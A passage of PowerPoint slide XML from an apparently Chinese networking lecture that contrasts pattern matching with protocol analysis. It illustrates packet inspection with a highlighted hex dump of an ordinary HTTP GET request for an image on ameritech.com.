              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6033064E-3708-4943-9F7E-830F4E5DC7A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="2124075"/>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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>模式匹配</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168967" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF8CD151-11A0-42D5-AF31-E1C92A9007FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="2657475"/>
            <a:ext cx="2286000" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>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68968" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{986EFA1B-7463-4365-B10A-758874261AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="5629275"/>
            <a:ext cx="2286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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ethernet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168969" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F4B8C62-5DB6-4C62-9F0C-6562A7DEA6E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="5172075"/>
            <a:ext cx="2286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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168970" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{003E5568-8B73-4E68-88CC-F67A0135CA81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="4714875"/>
            <a:ext cx="2286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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168971" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49D70202-8878-4FB4-81C6-A8E86BC0F32D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="2124075"/>
            <a:ext cx="274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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>协议分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168972" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C3604E-95CB-40AB-B42A-F46A55EB7E74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2657475"/>
            <a:ext cx="2286000" cy="6858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68973" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AEF728C-E74B-4C20-A274-B662B41C53D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="4257675"/>
            <a:ext cx="2286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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168974" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5BE25CA-F252-45E4-BEBE-558DC8B64CF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="3800475"/>
            <a:ext cx="2286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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Unicode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168975" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35CA26AC-9E24-4A85-AF8F-CFDE3FA1EF07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="3333750"/>
            <a:ext cx="22860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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XML</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3FA9E9D0-46E8-44C2-AE83-756F556662F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="152400"/>
            <a:ext cx="7793038" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>模式匹配</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169987" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C47B9D-9919-4736-A81C-006F804F3673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="1143000"/>
            <a:ext cx="761365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500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0  0050 dac6 f2d6 00b0 d04d cbaa 0800 4500   .P.......M....E. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  10  0157 3105 4000 8006 0000 0a0a 0231 d850   .W1.@........1.P </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  20  1111 06a3 0050 df62 322e 413a 9cf1 5018   .....P.b2.A:..P. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  30  16d0 f6e5 0000 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4745 5420 2f70 726f 6475</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ......</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /produ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40  6374 732f 7769 7265 6c65 7373 2f69 6d61   cts/wireless/ima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50  6765 732f 686f 6d65 5f63 6f6c 6c61 6765   ges/home_collage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60  322e 6a70 6720 4854 5450 2f31 2e31 0d0a   2.jpg HTTP/1.1..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70  4163 6365 7074 3a20 2a2f 2a0d 0a52 6566   Accept: */*..Ref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80  6572 6572 3a20 6874 7470 3a2f 2f77 7777   erer: http://www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90  2e61 6d65 7269 7465 6368 2e63 6f6d 2f70   .ameritech.com/p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a0  726f 6475 6374 732f 7769 7265 6c65 7373   roducts/wireless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b0  2f73 746f 7265 2f0d 0a41 6363 6570 742d   /store/..Accept-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c0  4c61 6e67 7561 6765 3a20 656e 2d75 730d   Language: en-us.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d0  0a41 6363 6570 742d 456e 636f 6469 6e67   .Accept-Encoding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e0  3a20 677a 6970 2c20 6465 666c 6174 650d   : gzip, deflate.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f0  0a55 7365 722d 4167 656e 743a 204d 6f7a   .User-Agent: Moz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100  696c 6c61 2f34 2e30 2028 636f 6d70 6174   illa/4.0 (compat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110  6962 6c65 3b20 4d53 4945 2035 2e30 313b   ible; MSIE 5.01;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120  2057 696e 646f 7773 204e 5420 352e 3029    Windows NT 5.0)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130  0d0a 486f 7374 3a20 7777 772e 616d 6572   ..Host: www.amer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140  6974 6563 682e 636f 6d0d 0a43 6f6e 6e65   itech.com..Conne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150  6374 696f 6e3a 204b 6565 702d 416c 6976   ction: Keep-Aliv </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 160  650d 0a0d 0a                              e....</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1010" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4ECBB10-7D4D-4B69-BEA1-6078F5FB82A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="1143000"/>
            <a:ext cx="7613650"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0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0  0050 dac6 f2d6 00b0 d04d cbaa 0800 4500   .P.......M....E. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  10  0157 3105 4000 8006 0000 0a0a 0231 d850   .W1.@........1.P </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  20  1111 06a3 0050 df62 322e 413a 9cf1 5018   .....P.b2.A:..P. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  30  16d0 f6e5 0000 4745 5420 2f70 726f 6475   ......GET /produ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40  6374 732f 7769 7265 6c65 7373 2f69 6d61   cts/wireless/ima </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  50  6765 732f </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>686f 6d65 5f63 6f6c 6c61 6765</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ges/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>home_collage</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  60  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>322e 6a70 6720</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 4854 5450 2f31 2e31 0d0a   </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1.. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  70  4163 6365 7074 3a20 2a2f 2a0d 0a52 6566   Accept: */*..Ref </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  80  6572 6572 3a20 6874 7470 3a2f 2f77 7777   erer: http://www </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  90  2e61 6d65 7269 7465 6368 2e63 6f6d 2f70   .ameritech.com/p </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  a0  726f 6475 6374 732f 7769 7265 6c65 7373   roducts/wireless </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  b0  2f73 746f 7265 2f0d 0a41 6363 6570 742d   /store/..Accept- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  c0  4c61 6e67 7561 6765 3a20 656e 2d75 730d   Language: en-us. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  d0  0a41 6363 6570 742d 456e 636f 6469 6e67   .Accept-Encoding </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  e0  3a20 677a 6970 2c20 6465 666c 6174 650d   : gzip, deflate. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  f0  0a55 7365 722d 4167 656e 743a 204d 6f7a   .User-Agent: Moz </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 100  696c 6c61 2f34 2e30 2028 636f 6d70 6174   illa/4.0 (compat </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 110  6962 6c65 3b20 4d53 4945 2035 2e30 313b   ible; MSIE 5.01; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 120  2057 696e 646f 7773 204e 5420 352e 3029    Windows NT 5.0) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 130  0d0a 486f 7374 3a20 7777 772e 616d 6572   ..Host: www.amer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 140  6974 6563 682e 636f 6d0d 0a43 6f6e 6e65   itech.com..Conne </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 150  6374 696f 6e3a 204b 6565 702d 416c 6976   ction: Keep-Aliv </a:t>
            </a:r>
          </a:p>
          <a:p>
